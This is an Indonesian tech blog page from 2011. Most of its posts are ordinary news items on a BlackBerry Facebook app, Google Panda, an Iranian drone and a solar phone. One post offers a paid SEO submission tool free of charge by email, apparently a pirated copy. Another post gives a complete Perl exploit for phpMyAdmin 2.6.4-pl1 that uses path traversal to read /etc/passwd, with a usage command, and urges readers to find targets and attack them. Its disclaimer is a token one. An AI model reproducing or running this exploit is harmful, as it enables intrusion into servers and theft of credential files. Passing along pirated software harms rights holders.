Minggu, 20 Maret 2011

Akses Ke 1750 Search Engine, direktori dan situs berkualitas tinggi

Hanya dengan Sekali Klik maka Web/Blog Sobat Terdaftar di 1750 Mesin Pencari, Direktori, dan Situs Berbintang.

Anda mungkin pernah mendengar Klaim yang menjanjikan untuk submit website Anda ke ratusan ribu search engine, direktori, dan situs dofollow PR (pagerank) tinggi... dan Anda mungkin percaya begitu saja dan akhirnya mencoba, Apa yang terjadi? atau anda pernah mendengar tentang software traffic equalizer, blogging Equalizet, Ad Word Analyzer dan software lainnya yang bisa meningkatkan keuntungan tersendiri dan menghemat waktu bagi para webmaster atau search enggine expert seperti anda?
Bayangkan saja kemungkinan jika Anda bisa mendapatkan akses ke 1750 search engine, direktori dan situs berkualitas tinggi, Apa yang terjadi dengan Web/blog Anda. banjir traffic, terindeks search enggine google, traffic alexa rank meningkat, menaikkan pagerank google, dll.
Submit Equalizer bekerja secara otomatis menempatkan situs anda ke seluruh 1750 derektori dengan kualitas tinggi dimana anda akan mendapatkan traffic link satu arah
Berikut penjelasan tentang langkah submit search enggine dengan Submit Equalizer Software :
Pertama :
jika anda telah mendownload software Submit Equalizer silahkan ekstrak file rar/zip-nya lalu klik submit untuk menginstal softwarenya.
Kedua :
Jika prosses instal telah selesai Silahkan Isi Contact Person pada menu General seperti gambar di bawah ini
submit equalizer
Ketiga :
Klik Manage URL dan silahkan isi sesuai Blog / web masing-masing Contoh seperti gambar berikut
submit equalizer
Setelah semua di isi Jangan Lupa Klik Extract Setting
Keempat :
Sekarang silahkan Klik Auto Submit
submit equalizer
Setelah itu Klik Start Maka Otomatis Blog/web Sobat di Submit otomatis keribuan Serach engine , direktori dan situs PR tinggi dofollow. Jika Keterangan menjelaskan Succsess Maka Blog kita sukses tersubmit dan jika ada keterangan Failed, Nanti bisa di submit secara Manual, kadang situs tersebut menggunakan Kode Captcha.
SOFTWARE Ini kurang lebih harganya $ 97, Silahkan Dicek jika Kurang Percaya disini :
http://www.submitequalizer.com
Anda Juga Bisa Mengetahui Kelebihan Software ini secara detail pada WEB-nya.
Ingin Download Secara Gratis?
Silahkan Follow Blog ini
Silahkan Komentar Di Artikel mana saja dengan menyertakan alamat email anda
Jika Sudah Silahkan email saya : cinta_raffi@yahoo.com
Maka Segera saya kirimkan Link Download beserta file full version-nya
Maaf Jika Memberatkan anda, Bagi anda yang sudah jadi Follower Blog ini Langsung saja Kirim pesan Via email, Selamat Mencoba dan JAdikan Blog/Web sobat Blog yang Ditakuti dan disegani Google
All the contents posted here are found from various Search Engines, blogs and forums. The Webmaster of this blog takes no responsibility what so ever for any of the content (image/audio/video). If you find some content inappropriate or if there is any violation of copyright, kindly contact the host of the content (image/audio/video) to remove it from their server.

Sabtu, 19 Maret 2011

Facebook Versi 2.0 BETA dengan Chat Real Time untuk Blackberry Telah Hadir

RIM pada hari Kamis kemarin memberikan pada para penguji Beta Zone  sebuah versi percobaan dari perbaikan lengkap untuk aplikasi Facebook di BlackBerry. Upgrade ke Facebook versi 2.0 mengikuti adanya penambahan fitur Facebook Chat untuk percakapan real-time. Selain itu ada bar notifikasi baru yang lebih mudah untuk permintaan chatting, friend request, pesan dan pemberitahuan terlepas  pengguna sedang ada di mana dalam aplikasi tersebut.



Sebagian besar fitur dan tampilan antarmuka telah ditingkatkan, termasuk news feed sederhana, profil yang lebih rinci, dan sebuah bar navigasi drop-down utama. Pemberitahuan dari aplikasi luar, seperti BBM atau aplikasi mail, juga sekarang muncul bukannya disembunyikan oleh Facebook UI.

Pengujian awal memerlukan BB Anda untuk diupgrade ke BlackBerry 6. BlackBerry 4.6 dan 5.0 pengguna akan mendapatkan support di kemudian hari, kata RIM.

Teknologi Terbaru Piring Terbang Buatan Militer Iran

Inilah Teknologi Terbaru Piring Terbang Buatan Militer Iran.,
Ilmuwan Iran mengklaim menciptakan piring terbang pertama, meskipun belum jelas seberapa tinggi objek itu mampu terbang, Media menyebut pesawat itu mirip UFO.

Piring terbang bernama Zohal yang berarti Saturnus itu merupakan pesawat ruang angkasa tak berawak yang dirancang untuk pencitraan udara.




Namun, berdasarkan keterangan Daily Mail, objek itu bisa dimanfaatkan untuk berbagai misi yang tidak disebutkan terperinci. Kantor media Fars menggambarkan piring terbang itu mirip UFO di film Hollywood pada1950-an.


“Alat transportasi yang mudah diluncurkan dan terbang, sedikit bunyi dan memiliki keuntungan yang sama dengan pesawat lain,” tulis laporan ISNA (Iran’s Student’s News Agency).


Perangkat itu dilengkapi autopilot, pengatur stabilitas gambar, GPS dan alat perekam kualitas HD. Program luar angkasa Iran yang ambisius tampaknya menjadi peringatan bagi dunia Barat, karena pada waktu yang sama, teknologi misil yang digunakan untuk program luar angkasa sama dengan teknologi membangun rudal balistik antarbenua.


Tahun lalu, Iran mengumumkan kesuksesan mereka berhasil mengirim tikus, kura-kura dan cacing ke luar angkasa. Mereka berambisi mengirim manusia ke antariksa, sembilan tahun mendatang.

Rabu, 09 Maret 2011

Google Terbaru 2011 (Google Caffeine) Google Panda Algoritma search engine

Setelah di awal tahun 2010 lalu, google melakukan update algoritma search engine dengan nama "Google Caffeine" , kini di akhir bulan februari 2011 google kembali melakukan update algoritma yang dinamakan "Google Panda". Google Caffeine yang sebelumnya dianggap google bakal memberikan hasil pencarian yang lebih baik ternyata belum menjamin situs-situs berkualitas tampil pada posisi utama SERP, sehingga di tahun 2011 ini Google melakukan update Google Terbaru 2011 (Google Caffeine) Google Panda Algoritma search engine .

Dalam algoritma Google Panda ini google lebih menekankan pada antisipasi content farm. Buat teman yang masih pemula mungkin masih bingung apa yang dimaksud content farm. Bredasarkan informasi yang saya cuplik dari wikipedia tentang peternakan konten  bisa dilihat disini content farm
Content farm .  In the context of the World Wide Web, the term content farm is used to describe a company that employs large numbers of often freelance writers to generate large amounts of textual content which is specifically designed to satisfy algorithms for maximal retrieval by automated search engines. Their main goal is to generate advertising revenue through attracting reader page views



Versi google translate :
Content farm (Peternakan konten) adalah istilah digunakan untuk menggambarkan sebuah perusahaan website yang mempekerjakan sejumlah besar penulis lepas (freelance writer) untuk menghasilkan sejumlah besar konten teks yang dirancang khusus untuk memenuhi algoritma pencarian maksimal oleh mesin pencari secara otomatis. Tujuan utama mereka adalah untuk menghasilkan pendapatan iklan melalui tampilan menarik pembaca halaman.




Sebagai informasi Google mulai menurunkan rating blog yang terdeteksi sebagai "content farm" sehingga beberapa situs yang dikategorikan sebagai content farm mengalami penurunan drastis pengunjung yang berasal dari search engine. Beberapa situs yang mengalami penurunan prosentase pengunjung adalah ezineaticles mengalami penurunan hingga 86%, hubpages mengalami penurunan hingga 80% . Sedangkan situs yang mengalami peningkatan pengunjung seperti wikihow.com meningkat hingga 79%, answers.yahoo.com 29% , selengkapnya bisa dilihat disini Google Farmer Update affected

Berdasarkan informasi dari situs official google tentang Finding more high-quality sites in google search untuk saat ini algoritma google panda masih diterapkan di Amerika, untuk negara lain termasuk Indonesia bakal menyusul  kebagian efek google panda.Efek terbesarnya kemungkinan banyak terasa pada situs social bookmark dan situs article directory.

Sebagai blogger pemula tidak perlu dipusingkan dengan update algoritma tersebut, sebaiknya tetap mematuhi rambu-rambu yang telah ditetapkan oleh google di situs google webmaster center guideline
Beberapa diantaranya :
- Membuat konten blog yang asli dan mempunyai relevansi topik tertentu(postingan hasil buatan sendiri bukan hasil copy paste)
- Blog dapat memberikan Informasi dan menawarkan solusi pada pengunjung blog
- Postingan blog mempunyai manfaat buat pengunjung

dll.

Buat blogger pemula tidak perlu berkecil hati dalam bersaing di serp google, karena semua blog masih mempunyai peluang untuk berkembang, Kita hanya perlu fokus pada konten blog dan target pengunjung blog apakah fokus pada pengunjung level pemula atau menengah.

Kamis, 03 Maret 2011

Cara Membuka Akses Keseluruhan dari Database

Phpmyadmin biasa nya tempat kita membuka akses keseluruhan dari database dan tempat kita membuat,menghapus dan memanipulasi data jadi phpmyadmin adalah tempat yang sangat rahasia bagi sang admin nah apa jadi nya kalo tempat yang sangat sakral itu bisa di buka ??? wah... gawat donk...
PERINGATAN ADMIN : PATCH YOUR SERVER NOW!!!
so apa lagi.... Lets rock and roll, sebelum kita melangkah lebih jauh mari kita analisis di mana lubang untuk kita susupi ke dalam sistem 
  1. Direktory phpmyadmin biasa nya ada di http://www.target.com/phpmyadmin/ nah apabila direktory itu tidak di proteksi maka gawat donk jadi biasa nya tempat itu pasti di password... nah loh gimana kita masuknya??? jangan panik.... lanjut saja
  2. File vulnerable yang bisa kita intip maka berdasarkan hal di atas ( duh kek lagi kuliah aja yah formal banget ) , mari kita membuat exploit sederhana
[dokter@localhost exploit]$ cat > phpmyadmin.pl
#!/usr/bin/perl
use IO::Socket;
# dokter^cinta
# bruteforce team @dalnet
#
# exploit phpMyAdmin 2.6.4-pl1
#
#
# Greatz to all my friends
# thanks for your idea to make this exploit
#
# Contact : dokter.cinta[at]gmail.com
# Website : http://Forum.doktercinta.org
#
if (@ARGV < 3)
{
print "\r\n Modified By: Dokter^cinta @ dalnet\r\n";
print "EXpl01T phpMyAdmin 2.6.4-pl1\r\n";
print " \r\n";
print "perl phpmyadmin.pl target /DIR/ FILE\r\n\r\n";
print "target - target dimana ada phpmyadmin contoh: http://localhost\r\n";
print "DIR - Direktori untuk PMA contoh: /phpMyAdmin- 2.6.4-pl1/\r\n";
print "FILE - file untuk di intip ../../../../../etc/passwd\r\n\r\n";
print "contoh cmd: perl phpmyadmin.pl http://localhost /phpMyAdmin-2.6.4-pl1/
../../../../../etc/passwd\r\n\r\n";
print "\r\n Bruteforce Team @dalnet\r\n";
exit();
}
$HOST = $ARGV[0];
$DIR = $ARGV[1]."libraries/grab_globals.lib.php";
$FILE = "usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=".
$ARGV[2].
"&subform[1][cXIb8O3]=1";
$LENGTH = length $FILE;
print "\r\ntarget adalah: ".$HOST."\r\n\r\n";
$HOST =~ s/(http:\/\/)//;
$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST",
PeerPort => "80") || die "Error 404\r\n\r\n";
print $get1 "POST ".$DIR." HTTP/1.0\n";
print $get1 "Host: ".%HOST."\n";
print $get1 "Content-Type: application/x-www-form-urlencoded\n";
print $get1 "Content-Length: ".$LENGTH."\n\n";
print $get1 $FILE;
while ($odp = <$get1>)
{
if ($odp =~ /Warning<\/b>: main\(\): akses ditolak hikz hikz hikz .\/$ARGV[2]
in
/ ) {
printf "\n\nFile ".$ARGV[2]." tak ada om :( .\r\n\r\n";
exit;
}
printf $odp;
}
maka kita cari target yang pake phpmyadmin lalu apa lagi....??? yah serang !!!!!!!!!!!!!!!!!!!
[dokter@localhost exploit]$ perl phpmyadmin.pl www.target.com /phpMyAdmin-2.6.4-pl1/
../../../../../etc/passwd
target adalah : www.target.com dan good luck you got their database
:P
===========================================================
WARNING !!!
saya tidak bertanggung jawab atas penyalah gunaan dari artikel ini dan ini hanya sebagai ilmu pengetahuan belaka jadi sekali lagi ...
PLEASE DONT TRY THIS AT OTHER PEOPLE PCS
TRY THIS WITH YOUR OWN RISK

Tekhnologi Terbaru 2011, China Bikin Ponsel Android Tenaga Surya


Umeox Apollo pertama muncul di Mobile World Congress (MWC) Barcelona. Ponsel itu memanfaatkan solusi sumber energi surya Intivation, perusahaan Amsterdam yang memberi solusi sumber energi alternatif ponsel.

Umeox Apollo merupakan smartphone pertama yang menggunakan sistem operasi (OS) Android Froyo (2.2). Seperti dikutip TG Daily, smartphone berlayar sentuh itu juga didukung memori flash 1GB, RAM 512 MB dan kamera 3 megapiksel yang akan menjadi senajat Umeox Apollo untuk bersaing.


Fitur-fitur itu memang terbilang biasa,satu-satunya hal menarik adalah keunikannya pada pengisian ulang baterai menggunakan energi matahari. Untuk saat ini, Umeox Apollo baru didistribusikan China.

Negara-negara lain akan segera menyusul, salah satunya Amerika Serikat (AS). Harga ponsel ini pun tergolong murah, yakni US$ 100 (Rp 882 ribu).